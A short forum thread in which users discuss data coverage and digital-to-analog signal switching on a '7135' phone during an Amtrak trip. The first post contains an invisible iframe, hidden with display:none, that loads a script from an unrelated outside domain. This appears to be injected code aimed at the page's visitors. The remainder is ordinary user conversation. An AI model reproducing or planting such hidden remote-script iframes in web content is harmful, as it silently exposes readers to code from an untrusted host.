+ Reply to Thread

express net & 7135 ROCKS

I have been surfing, checking email & posting here for the past 3 hours from a DC to NYC Amtrak train. Only one short dropout in coverage for less then 1 min. and 25% of my 1st battery still left!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

That's awesome, Alanb. Sounds like you're getting a good, clean signal. In another thread, you were a bit concerned about signal strength. Here's the quote:

5: Although I am not having the kind of signal problems Cloudy1 reported, I do not appear to be getting as strong a signal as my old StarTac 7868 did. I know you can't really trust the visual signal strength display, but I have had the phone go into "searching" mode a few times. The StarTac would also occasionally do this, but it seemed more willing to flip over to analog instead of keep searching for a digital signal.

What's your opinion after a few more days use?

as I have been watching it, I think it is reluctent to switch to analog mode. If it loses a digital signal, it will hunt around for about 20 secs and usually picks up the digital signal again. it went into analog once today pulling out of Penn Central in the tunnel and popped back to digital a few secs later. only time i have seen it. Haven't lost a call yet.